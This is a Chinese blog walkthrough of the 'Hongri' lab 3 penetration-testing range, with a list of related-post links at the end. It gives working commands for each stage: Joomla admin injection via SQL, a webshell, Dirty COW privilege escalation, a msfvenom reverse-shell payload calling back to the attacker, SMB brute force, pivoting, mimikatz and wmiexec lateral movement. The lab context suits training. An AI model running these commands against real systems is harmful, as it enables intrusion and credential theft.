内网渗透—红日靶场三
文章目录
- 0x01、环境配置
- 0x02、Centos getshell
- 0x03、Centos提权
- 0x04、内网穿透—设置路由
- 0x05、内网穿透—设置代理
- 0x06、获取内网目标shell
- 通过smb拿shell
- 或者本地挂代理使用k8tools拿shell
0x01、环境配置
打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。
挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。
除重新获取ip,不建议进行任何虚拟机操作。
参考虚拟机网络配置,添加新的网络,该网络作为内部网络。
注:名称及网段必须符合上述图片,进行了固定ip配置。
描述
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码。
攻击机与Centos处于公网(桥接),其余机器与Centos处于同一内网
用Centos去ping其他内网机器查看是否网络畅通
0x02、Centos getshell
访问网站,发现是joomla的cms,可以使用kali扫描目录
joomscan -u 目标IP
找到后台地址、robots.txt、配置文件等路径
在配置文件中发现数据库账号信息
尝试使用远程管理工具连接数据库
查后台用户名密码,通过搜索功能找到可能与用户账好信息有关的表
得到一个超级用户的信息
密码经过MD5加盐处理无法解密
此时可以通过cms官网查询管理员账户重置密码或创建新超级管理员方法
INSERT INTO `jos31_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
注意修改表前缀
此时发现已成功新建一个账户
解密后得到新超管密码
登录后台后发现报错,但是不影响我们getshell
在功能里发现了模板模块,众所周知,这个地方是getshell的多发点
进入后新建一个文件或者直接修改当前存在文件,加上一句话后,访问即可getshell
回到刚刚报错,通过百度查询到这个原因是:检查php版本,代码中预设的版本日期都过期了,就是查找当前时间的版本找不到了,看下图
文件路径:/var/www/html/plugins/quickicon/phpversioncheck/phpversioncheck.php
将日期修改即可
'7.3' => array('security' => '2020-12-06','eos' => '2023-12-06',),
0x03、Centos提权
查看当前用户权限发现无法执行命令
猜测是disable_functions禁用了一些可以执行命令或代码的函数。
在开始目录扫描时发现了一个1.php,进入后是phpinfo
使用蚁剑插件
修改刚才的连接
再次执行命令,发现是低权限用户
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-j7Ftq9J1-1650711340054)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220419201621975.png)]
查看对方ip发现网卡地址为192.168.93.120,与我们访问的IP(192.168.93.100)不同,猜测对方开启Nginx反向代理
查看其它是否存在敏感文件,一般根目录下的tmp文件下会有重要信息
发现一个写有账号密码的文件
之前的端口扫描中发现了22端口,尝试连接SSH,成功连上
信息收集第一步—先看内核
uname -a
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fGsnSxCm-1650711340055)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220420000400954.png)]
版本号大于2.6.32,可以使用脏牛漏洞提权
使用winscp传输文件
对脏牛赋权并编译
chmod +x dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty root //修改root账户,密码为root
提示已存在文件
rm /tmp/passwd.bak
./dirty root
这里虽然用户名是firefart,但是执行id命令发现是root权限
0x04、内网穿透—设置路由
kali中生成马并监听
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.63.43.7 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
exploit
用root权限账号传输马到服务器上
赋权并运行马
成功上线
查看路由
run get_local_subnets
添加路由
run autoroute -s 192.168.93.0/24
run autoroute -p
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eSU5mpEM-1650711340058)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220420010334636.png)]
挂起
background
smb内网探测
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.93.0/24
exploit
探测出三台windows主机
0x05、内网穿透—设置代理
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 10.63.43.7(攻击机)
exploit
记得修改配置文件
爆破smb
proxychains hydra -l administrator -P 字典 -s 445 192.168.93.20 smb
爆破得到administrator账号密码123qwe!ASD
0x06、获取内网目标shell
通过smb拿shell
proxychains smbclient //192.168.93.20/c$ -U administrator
输入密码后成功登录
使用put命令可以传文件
或者本地挂代理使用k8tools拿shell
在k8tools文件夹下打开终端net use \\192.168.93.20\ipc$ "123qwe!ASD" /user:"administrator"
当提示命令完成后说明对方开始开启ipc连接copy 本地文件地址 \\192.168.93.20\C$
添加计划任务
schtasks /create /tn "test" /tr C:\mimikatz.exe /sc once /st 17:00 /S 192.168.93.20 /RU System -U administrator /p "123qwe!ASD"方法二
wmiexec.exe administrator:123qwe!ASD@192.168.93.20
输入?查看帮助
kali中wmiexec.py工具
下载地址:https://github.com/coresecurity/impacket/blob/masterexamples/wmiexec.py
需要先下载impacket工具包,这里面有很多工具
git clone http://github.com/CoreSecurity/impacket.git
cd impacket/
pip install
cd impacket-master/examples
安装成功后,切换到examples目录下,运行如下命令获取目标系统192.168.93.20的shell
proxychains python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
设置远程桌面
reg add “HKLM\System\CurrentControls\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f
开启远程桌面
wmic RDTOGGLE WHERE ServerName=‘%COMPUTERNAME%’ call SetAllowTSConnections 1
检查端口状态
net -an|find “3389”
使用msf生成马并监听,此时需要挂代理去开启msf
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=12345 -f exe > 1.exeproxychains4 msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.93.20
set LPORT 12345
exploit
此时可以看到两种方式上传的文件(mimikatz.exe和1.exe)
getuid
使用猕猴桃抓取密码
load mimikatz
wdigest或kerberos
但是不知道到怎么回事没有抓回来
如果使用load kiwi需要system权限
load kiwi
creds_all
getsystem
getuid
creds_all
抓取密码
这里同样没有抓回来
其余思路同上
内网渗透—红日靶场三相关推荐
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
- vulnstack内网渗透环境靶场-1 大全
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
- 内网渗透—红日安全vulnstack(二)
文章目录 1. 环境说明 2. 开启靶场 3. 外网渗透 3.1 端口扫描 3.2 拿shell 3.2.1 CVE-2019-2725 3.2.2 MSF17-010 3.3 提权 4. 内网渗透 ...
- 螣龙安科笔记:内网渗透测试(三)
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程. (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫 ...
- 内网渗透初探(靶场环境搭建+web层面实验+内网基本操作)
靶场环境搭建 在此我使用的是红日安全的环境 下载地址(红日安全) 图片取自互联网,ip地址以实际地址为准 操作系统 IP地址 攻击者 kali IP地址:192.168.3.10 攻击者 Window ...
- 三层内网渗透笔记-靶场(teamssix.com)
环境搭建 参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射 端口 target 1和target2 开始: tar ...
- 内网渗透DC-1靶场通关(CTF)
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题. ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- 三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
最新文章
- 好事也要好做---孔子责子贡
- 所有字符不含换行 正则表达式_网络爬虫 | 正则表达式
- 成功通过pmp_这就是你为啥要学PMP!!!
- [react] create-react-app创建新运用怎么解决卡的问题?
- 斗地主AI算法——第一章の业务逻辑
- 前端开发必看 | Vue在前端市场这么火,它到底是什么?
- 关于PHP的工作流引擎
- Windows平台手动卸载Oracle Server【完整+干净】
- java技术大牛之路
- centos引导过程中的故障排除
- android重复点击屏幕,手机不ROOT.推荐一款android能用的屏幕连点器,类似按键精灵!...
- 分片和分区的概念及区别
- python 使用PIL库批量修改图片大小
- 审计工作存在的难点和问题_基层审计工作中存在的问题及建议
- Tkinter教程之Label篇
- python学习小组分组程序_【Python】每日一练:学生学习小组分组程序
- Win11找不到gpedit.msc怎么办?Win11无法打开gpedit.msc解决教程
- 最小的k个数(堆排序实现)
- 武汉大学计算机学院国家重点实验室,实验室简介
- 通过封装和数字万用表判断贴片二极管、稳压管、LED、正负级性
热门文章
- 将我理解的web3.0讲给你听
- 用计算机制作演示文稿教案博客,《制作演示文稿》教案
- Dr.com海淀宽带多人使用拨号软件
- TensorFlow Lite 指导
- 宗教与“我们生活在虚拟世界中的假设”:上帝是人工智能吗?
- ipv6以及ip6tables的nat转发
- NEXUS 5 工厂镜像刷机教程及刷机包目录解析
- 微信论坛交流小程序系统毕业设计毕设(5)任务书
- C语言——鸡兔同笼型——36块砖,36个人,男搬4,女搬3,两个小孩搬一块。问几男几女几小孩?
- git pull 报Your branch and 'origin/master' have diverged